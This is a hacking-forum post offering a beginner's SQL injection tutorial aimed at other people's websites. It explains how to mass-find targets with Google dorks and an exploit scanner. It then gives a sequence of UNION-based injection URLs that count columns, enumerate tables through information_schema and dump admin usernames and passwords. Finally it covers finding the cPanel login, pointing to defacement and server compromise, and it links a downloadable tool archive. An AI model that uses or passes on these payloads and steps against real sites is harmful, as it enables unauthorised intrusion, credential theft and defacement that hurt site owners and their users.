[TUT] SQL Injection Tutorial for Beginners Hello fellow Bz members. I've been wanting to post a tut on sql injection and here goes my take on it. Also please please leave me feedback and any suggestions. Thanks What exactly is SQL Injection? SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. What will I need to perform an SQL Injection attack? [+] exploit scanner [+] a good list of "google dorks" [+] admin finder [+] half a brain and the will to learn lol I have provided all but 2 (in a .rar package available for download below) of the stated things above that you need. Also provided is a virus scan of the .rar for the skeptics lol CLICK HERE TO DOWNLOAD THE TOOLS Ok after you are done downloading the tools. Open the .rar located on your desktop. Now open the .txt called "dorks'. From this list you can pick any dork you feel like scanning with. For good search results search for a dork like this. Code: index.php?id= http://i825.photobucket.com/albums/z...HaXz/sqli1.jpg Atfer you have done this your going to want to switch your "Max Url" from 100 to 1000 for alot of search results. Then press scan on your exploit scanner. After it is done scanning your going to press "Test Sites". After all this is done you should have two lists and it should look like this. http://i825.photobucket.com/albums/z...HaXz/sqli2.jpg After it is done testing all scanned sites. These pre-tested sites might be sqli vulnerable. But you must first check each site individually. To test a individual site add a " ' " after the url. For example. Code: sqlivulnerablesite.com/index.php?id=1' Lets say for instance you found a site that might be vulnerable (or what you think maybe a vulnerable site). If a error on the web page comes up something like this. Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 Code: sqlivulnerablesite.com/index.php?id=1 order by 1-- Knowing that there is already 1 column in this database we do another code injection. Like this. Code: sqlivulnerablesite.com/index.php?id=1 order by 2-- Usually if the pages loads correctly after trying the #2 then I try stepping the number up to around 10. *NOTE* If you load the web page on a code injection like this. Code: sqlivulnerablesite.com/index.php?id=1 order by 10-- Code: Unknown column '10' in 'order clause' Code: sqlivulnerablesite.com/index.php?id=1 order by 9-- The next step in this attack is to find out what column is vulnerable to our attack. We use this code injection in your address bar after the vulnerable site. Like this. Code: sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9-- Code: sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9 Code: sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables-- Code: sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)-- Now we must find the ascii value of the word admins. GO HERE TO CONVERT TEXT TO ASCII The ascii value of admins is Code: & #97 ; & #100 ; & #109 ; & #105 ; & #110; & #115 ; Code: 97,100,109,105,110,115 Code: sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)-- Code: sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from -- When the page loads it should show the data of the username and password for cpanel access. Now to access the cpanel we must find the login page. I provided a admin finder.exe in the .rar. Open it up and type in the url of your vulnerable site. From there it scan till it finds the login page for admin cpanel access. Which can lead to defacement and web server compromise. Hopefully someone found this thread useful/helpful. I take full credit in writing this tutorial out. PM me if you need any further help with your sql injections! http://hfmaxcdn.witza.netdna-cdn.com...s/superman.gif |
All times are GMT +5. The time now is 04:41 AM. |
Powered by vBulletin® Version 3.8.2
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.